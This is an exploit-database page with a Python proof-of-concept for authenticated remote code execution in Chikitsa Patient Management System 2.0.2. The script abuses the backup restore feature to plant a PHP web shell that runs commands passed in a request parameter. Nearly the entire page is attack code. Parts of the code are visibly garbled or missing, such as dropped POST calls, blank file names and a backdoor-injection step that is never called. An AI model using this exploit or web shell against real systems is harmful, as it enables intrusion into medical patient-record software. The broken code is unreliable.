Chikitsa patient management system 2.0.2 backup remote code execution (rce) (authenticated) Vulnerability / Exploit

Exploits / Vulnerability Discovered : 2021-12-09 | Type : webapps | Platform : php
This exploit / vulnerability, Chikitsa patient management system 2.0.2 backup remote code execution (rce) (authenticated), is for educational purposes only; if you use it, you do so at your own risk!

[+] Code ...

# Exploit Title: Chikitsa Patient Management System 2.0.2 - 'plugin' Remote Code Execution (RCE) (Authenticated)
# Date: 03/12/2021
# Exploit Author: 0z09e (
# Vendor Homepage:
# Software Link:
# Version: 2.0.2
# Tested on: Ubuntu

import requests
import os
from zipfile import ZipFile
import argparse

def login(session , target , username , password):
print("[+] Attempting to login with the credential")
url = target + "/index.php/login/valid_signin"
login_data = {"username" : username , "password" : password} , data=login_data , verify=False)
return session

def download_backup( session , target):
print("[+] Downloading the backup (This may take some time)")
url = target + "/index.php/settings/take_backup/"
backup_req = session.get(url , verify=False)
global tmp_dir
tmp_dir = os.popen("mktemp -d").read().rstrip()
open(tmp_dir + "/" , "wb").write(backup_req.content)
print(f"[+] Backup downloaded at {tmp_dir}/")

def modify_backup():
print("[+] Modifying the backup by injecting a backdoor.")
zf = ZipFile(f'{tmp_dir}/', 'r')
open(tmp_dir + "/uploads/media/rce.php" , "w").write("<?php system($_REQUEST['cmd']);?>")
os.popen(f"cd {tmp_dir}/ && zip -r chikitsa-backup.sql prefix.txt uploads/").read()

def upload_backup(session , target):
print("[+] Uploading the backup back into the server.(This may take some time)")
url = target + "/index.php/settings/restore_backup"
file = open(f"{tmp_dir}/" , "rb").read() , verify=False ,files = {"backup" : ("" , file)})
print(f"[+] Backdoor Deployed at : {target}/uploads/restore_backup/uploads/media/rce.php")
print(f"[+] Example Output : {requests.get(target +'/uploads/restore_backup/uploads/media/rce.php?cmd=id' , verify=False).text}")

def main():
parser = argparse.ArgumentParser("""
__ _ __ _ __
_____/ /_ (_) /__(_) /__________ _
/ ___/ __ \/ / //_/ / __/ ___/ __ `/
/ /__/ / / / / ,< / / /_(__ ) /_/ /
\___/_/ /_/_/_/|_/_/\__/____/\__,_/

Chikitsa Patient Management System 2.0.2 Authenticated Remote Code Execution :
POC Written By - 0z09e (\n\n""" , formatter_class=argparse.RawTextHelpFormatter)
req_args = parser.add_argument_group('required arguments')
req_args.add_argument("URL" , help="Target URL. Example :")
req_args.add_argument("-u" , "--username" , help="Username" , required=True)
req_args.add_argument("-p" , "--password" , help="password", required=True)
args = parser.parse_args()

target = args.URL
if target[-1] == "/":
target = target[:-1]
username = args.username
password = args.password

session = requests.session()
login(session ,target , username , password)
download_backup(session , target )
upload_backup(session , target)

if __name__ == "__main__":
